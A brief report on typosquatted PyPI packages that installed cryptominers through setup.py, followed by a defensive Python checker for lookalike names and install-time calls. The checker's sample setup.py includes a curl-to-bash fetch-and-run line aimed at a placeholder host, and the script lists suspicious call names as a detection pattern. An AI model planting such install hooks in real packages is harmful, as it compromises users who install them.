Security researcher Ax Sharma caught multiple PyPI packages installing cryptominers this week. Six different packages, most of them impersonating the popular “matplotlib” Python package used to create graphs and visualizations, used similar spellings or wording in an attempt to dupe unsuspecting victims into using the malicious package instead. In a blog post, Sharma reported that the malicious setup.py files in these packages downloaded a Bash script from a GitHub repository during package installation. These scripts downloaded a cryptominer known as “Ubqminer”, which mined the Ubiq cryptocurrency. Another version of the malicious package installer opted for the open-source T-Rex, which allowed the attacker to use the victim’s GPU instead of the CPU when mining.
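A reviewer-side triage check for the two signals described above (a package name that resembles matplotlib, and a setup.py that starts a process or fetches content at install time), written as an added example that is not from Sharma's blog post. The name `matplotlb`, the `example.invalid` URL, the call list and all function names are constructed for illustration; a hit is a reason for manual review, not a verdict.

```python
import ast
import difflib

POPULAR = ["matplotlib"]  # assumption: names the reviewer wants to protect

# Calls that start a process or fetch remote content; setup.py runs at install.
SUSPICIOUS_CALLS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.call",
    "subprocess.Popen", "subprocess.check_call", "subprocess.check_output",
    "urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get",
}

def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    return ".".join(reversed(parts + [node.id])) if isinstance(node, ast.Name) else None

def lookalike_of(name, threshold=0.8):
    """Return the popular name that `name` resembles without matching it."""
    norm = name.lower().replace("-", "").replace("_", "")
    if norm in POPULAR:
        return None
    for known in POPULAR:
        ratio = difflib.SequenceMatcher(None, norm, known).ratio()
        if known in norm or ratio >= threshold:
            return known
    return None

def install_time_calls(setup_source):
    """Return sorted (line, call) pairs; aliased imports are not resolved."""
    calls = [(n.lineno, dotted_name(n.func))
             for n in ast.walk(ast.parse(setup_source))
             if isinstance(n, ast.Call)]
    return sorted(c for c in calls if c[1] in SUSPICIOUS_CALLS)

# Constructed sample: placeholder URL and a made-up lookalike name.
SAMPLE_SETUP = '''import os
from setuptools import setup

os.system("curl -s https://example.invalid/placeholder.sh | bash")
setup(name="matplotlb", version="0.0.1")
'''

if __name__ == "__main__":
    print(lookalike_of("matplotlb"), install_time_calls(SAMPLE_SETUP))
```

The source is only parsed, never executed, so the check can be run against an unpacked sdist before anything is installed.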